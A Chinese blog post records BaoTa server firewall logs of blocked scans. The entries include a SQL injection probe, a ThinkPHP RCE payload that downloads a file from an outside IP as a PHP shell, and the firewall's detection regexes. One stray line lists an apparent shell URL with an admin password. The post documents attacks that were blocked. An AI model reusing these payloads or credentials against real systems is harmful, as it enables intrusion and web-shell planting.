服务器宝塔入侵记录 防火墙链接 这些都是软件扫的
类型 GET 过滤器 args
URI地址
/webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20MD5(5200172853)--
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
过滤规则
(?:(union(.*?)select))
传入值
site_id:-1159 UNION ALL SELECT MD5(5200172853)--
风险值
UNION ALL SELECT
类型 GET 过滤器 args
URI地址
/?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=copy&vars%5B1%5D%5B%5D=http://61.147.93.58:8888/down/W3kmfQKBexjv&vars%5B1%5D%5B%5D=.admin_cc.php
User-Agent
python-requests/2.24.0
过滤规则
(invokefunction|call_user_func_array|\\think\\)
传入值
function:call_user_func_array
风险值
call_user_func_array
类型 POST 过滤器 post
URI地址
//index.php?s=/admin/upload/uploadfile
User-Agent
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36
过滤规则
http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22
类型 POST 过滤器 post
URI地址
//?s=captcha&test=-1
User-Agent
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
过滤规则
拦截ThinkPHP 5.x RCE 攻击,并且被封锁IP
yanhanmetals.com/147.php admin Aa147258
如果您的问题还未解决可以联系站长付费协助。
有问题可以加入技术QQ群一起交流学习
本站vip会员 请加入无忧模板网 VIP群(50604020) PS:加入时备注用户名或昵称
普通注册会员或访客 请加入无忧模板网 技术交流群(50604130)
客服微信号:15898888535
声明:本站所有文章资源内容,如无特殊说明或标注,均为采集网络资源。如若内容侵犯了原著者的合法权益,可联系站长删除。